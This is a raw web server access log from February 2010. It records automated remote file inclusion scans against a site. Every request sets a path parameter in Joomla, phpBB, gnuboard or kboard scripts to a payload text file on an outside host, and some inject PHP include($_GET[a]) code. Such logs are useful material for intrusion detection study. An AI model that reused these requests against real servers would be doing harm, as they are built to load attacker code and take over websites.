110.93.134.178 - - [25/Feb/2010:04:27:20 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:04:27:23 -0800] "GET /logs/access_100215.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.60.90.76 - - [25/Feb/2010:04:27:24 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.60.90.76 - - [25/Feb/2010:04:27:24 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.60.90.76 - - [25/Feb/2010:04:27:25 -0800] "GET /logs/access_100204.log////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:04:27:30 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:04:27:30 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:04:27:30 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
202.60.90.76 - - [25/Feb/2010:04:28:10 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.60.90.76 - - [25/Feb/2010:04:28:10 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.60.90.76 - - [25/Feb/2010:04:28:12 -0800] "GET /logs/access_100204.log////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:04:28:15 -0800] "GET /logs/access_100215.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:04:28:19 -0800] "GET /logs/access_100215.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [25/Feb/2010:04:28:34 -0800] "GET /logs/access_100119.log///include/admin.lib.inc.php?site_path=http://www.sinhan.net/zeroboard41/icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [25/Feb/2010:04:28:34 -0800] "GET //include/admin.lib.inc.php?site_path=http://www.sinhan.net/zeroboard41/icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [25/Feb/2010:04:28:35 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://www.sinhan.net/zeroboard41/icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:04:28:52 -0800] "GET /logs/access_100215.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [25/Feb/2010:04:28:59 -0800] "GET /logs/access_100123.log///include/admin.lib.inc.php?site_path=http://www.sinhan.net/zeroboard41/icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:04:29:06 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:04:29:06 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:04:29:06 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:04:29:25 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:04:30:15 -0800] "GET /logs/access_100215.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [25/Feb/2010:04:32:27 -0800] "GET /logs/access_100125.log////?_SERVER[DOCUMENT_ROOT]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [25/Feb/2010:04:32:28 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [25/Feb/2010:04:32:32 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:32:34 -0800] "GET ///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:32:34 -0800] "GET /logs////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:32:34 -0800] "GET /logs/access_100217.log////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:32:39 -0800] "GET /logs/access_100210.log////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:32:44 -0800] "GET /common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:32:44 -0800] "GET /logs/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:32:44 -0800] "GET /logs/access_100118.log/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [25/Feb/2010:04:32:45 -0800] "GET /logs/access_100120.log////?_SERVER[DOCUMENT_ROOT]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:32:50 -0800] "GET /common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:32:50 -0800] "GET /logs/access_100118.log/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:32:50 -0800] "GET /logs////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:32:50 -0800] "GET ///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:32:50 -0800] "GET /logs/access_100217.log////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:32:51 -0800] "GET /logs/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:32:53 -0800] "GET /logs/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:32:53 -0800] "GET /common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:32:53 -0800] "GET /logs/access_100118.log/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:32:55 -0800] "GET /logs/access_100210.log////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:04:36:02 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:04:36:02 -0800] "GET /logs/access_100208.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:04:36:02 -0800] "GET /logs/access_100126.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:04:36:07 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:36:07 -0800] "GET /logs//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:36:08 -0800] "GET /booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:36:10 -0800] "GET /logs/access_100204.log%20%20//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:36:19 -0800] "GET /logs/access_100204.log%20%20//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:36:20 -0800] "GET /logs//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:36:20 -0800] "GET /booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:36:59 -0800] "GET /logs/access_100215.log%20%20//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:37:15 -0800] "GET /logs/access_100215.log%20%20//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:37:36 -0800] "GET /logs/access_100204.log%20%20//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:37:36 -0800] "GET /booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:37:36 -0800] "GET /logs//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.60.90.76 - - [25/Feb/2010:04:37:40 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.60.90.76 - - [25/Feb/2010:04:37:40 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.60.90.76 - - [25/Feb/2010:04:37:40 -0800] "GET /logs/access_100124.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.60.90.76 - - [25/Feb/2010:04:37:52 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.60.90.76 - - [25/Feb/2010:04:37:53 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.60.90.76 - - [25/Feb/2010:04:37:53 -0800] "GET /logs/access_100223.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.60.90.76 - - [25/Feb/2010:04:37:53 -0800] "GET /logs/access_100124.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.60.90.76 - - [25/Feb/2010:04:38:05 -0800] "GET /logs/access_100223.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:38:08 -0800] "GET /logs/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:38:08 -0800] "GET /common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:38:09 -0800] "GET /logs/access_100118.log/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:38:14 -0800] "GET /common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:38:14 -0800] "GET /logs/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:38:14 -0800] "GET /logs/access_100118.log/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [25/Feb/2010:04:38:18 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:38:21 -0800] "GET /common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:38:22 -0800] "GET /logs/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:38:22 -0800] "GET /logs/access_100118.log/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:38:27 -0800] "GET /logs/access_100215.log%20%20//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:38:44 -0800] "GET /logs/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:38:44 -0800] "GET /common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:38:44 -0800] "GET /logs/access_100118.log%20%20/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [25/Feb/2010:04:38:59 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [25/Feb/2010:04:38:59 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:39:00 -0800] "GET /logs/access_100118.log%20%20/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:39:00 -0800] "GET /common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:39:00 -0800] "GET /logs/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [25/Feb/2010:04:39:08 -0800] "GET /logs/access_100125.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:39:17 -0800] "GET /logs/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:39:17 -0800] "GET /logs/access_100118.log%20%20/common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:04:39:18 -0800] "GET /common/db.php?commonpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [25/Feb/2010:04:39:22 -0800] "GET /logs/access_100120.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [25/Feb/2010:04:39:44 -0800] "GET /logs/access_100214.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
82.179.244.69 - - [25/Feb/2010:04:39:45 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
82.179.244.69 - - [25/Feb/2010:04:39:45 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
222.122.158.94 - - [25/Feb/2010:04:40:19 -0800] "GET /logs/access_100210.log//delete_all.php?board_skin_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [25/Feb/2010:04:40:19 -0800] "GET /delete_all.php?board_skin_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [25/Feb/2010:04:40:19 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [25/Feb/2010:04:40:20 -0800] "GET /delete_all.php?board_skin_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [25/Feb/2010:04:40:20 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [25/Feb/2010:04:40:20 -0800] "GET /logs/access_100210.log//delete_all.php?board_skin_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [25/Feb/2010:04:40:27 -0800] "GET /logs/access_100212.log//delete_all.php?board_skin_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [25/Feb/2010:04:40:29 -0800] "GET /logs/access_100212.log//delete_all.php?board_skin_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [25/Feb/2010:04:40:42 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:41:22 -0800] "GET ///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:41:22 -0800] "GET /logs/access_100217.log////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:41:22 -0800] "GET /logs////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:04:41:22 -0800] "GET /logs/access_100210.log////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:04:41:37 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:04:41:41 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
